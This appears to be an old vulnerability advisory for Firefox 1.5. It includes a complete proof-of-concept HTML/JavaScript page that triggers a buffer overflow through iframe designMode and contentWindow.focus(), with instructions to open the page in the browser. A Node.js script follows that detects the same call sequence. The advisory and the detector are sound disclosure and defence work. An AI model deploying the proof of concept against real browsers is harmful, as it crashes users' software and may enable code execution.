Firefox Code Execution!

Improper handling of JavaScript content allows attackers to execute arbitrary code and crash Mozilla Firefox.

Software:
Firefox Web Browser

Tested:

Linux and Windows clients, version 1.5.0.2
* Refreshing the page several times on Firefox version 1.5.0.3 crashes the browser.

Result:
Firefox Remote Code Execution and Denial of Service – Vendor contacted, no patch yet.

Problem:

Firefox mishandles certain JavaScript involving iframe.contentWindow.focus() in js320.dll and xpcom_core.dll.
Manipulating this call causes a buffer overflow.

Proof of Concept:
http://www.securident.com/vuln/ffdos.htm

Credits:

splices(splices [dot] org)
spiffomatic64(spiffomatic64 [dot] com)
Securident Technologies (securident [dot] com)

[CODE]

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
<script>
var textarea = document.getElementsByName("x_OtherInfo");
textarea=textarea.item(0);
var htmlarea = document.createElement("div");
htmlarea.className = "htmlarea";
textarea.parentNode.insertBefore(htmlarea, textarea);
var iframe = document.createElement("iframe");
htmlarea.appendChild(iframe);
var doc = iframe.contentWindow.document;
doc.designMode = "on";
doc.open();
doc.write("<iframe src=''>");
iframe.contentWindow.focus()
doc.close();
</script>

<!-- EOF -->

Save the file in HTML format and view it in the Firefox browser.
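
An added example, not part of the original advisory: a Node.js triage check that flags inline scripts containing the call sequence the proof of concept uses (designMode on, document.open, a write of a nested iframe, then contentWindow.focus before document.close). The function names, step labels and the second sample are constructed for illustration.

```javascript
// Added example: ordered-pattern triage for HTML; STEPS mirrors the PoC's call order.
const STEPS = [
  ["designMode on", /\.designMode\s*=\s*["']on["']/i],
  ["document.open", /\.open\s*\(/],
  ["write nested iframe", /\.write(?:ln)?\s*\([^)]*<iframe/i],
  ["contentWindow.focus", /\.contentWindow\.focus\s*\(/],
  ["document.close", /\.close\s*\(/],
];

// Return the steps found, in order, inside one script body.
function scanScript(src) {
  const seen = [];
  let pos = 0;
  for (const [name, re] of STEPS) {
    const m = re.exec(src.slice(pos));
    if (!m) break;
    seen.push(name);
    pos += m.index + m[0].length; // the next step must appear after this one
  }
  return seen;
}

// Scan every inline <script> block and report the longest ordered match.
function scanHtml(html) {
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let best = [];
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const seen = scanScript(m[1]);
    if (seen.length > best.length) best = seen;
  }
  return { flagged: best.length === STEPS.length, seen: best };
}

// Sample 1: the relevant lines of the script published in this advisory.
const ADVISORY_SAMPLE = `<script>
var doc = iframe.contentWindow.document;
doc.designMode = "on";
doc.open();
doc.write("<iframe src=''>");
iframe.contentWindow.focus()
doc.close();
</script>`;
// Sample 2 (constructed): an ordinary editor that focuses only after close().
const EDITOR_SAMPLE = `<script>
doc.open(); doc.write("<p>draft</p>"); doc.close();
doc.designMode = "on"; editor.contentWindow.focus();
</script>`;

console.log(scanHtml(ADVISORY_SAMPLE), scanHtml(EDITOR_SAMPLE));
```

String matching of this kind is a triage aid for cached pages or proxy captures; a flagged page still needs manual review.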
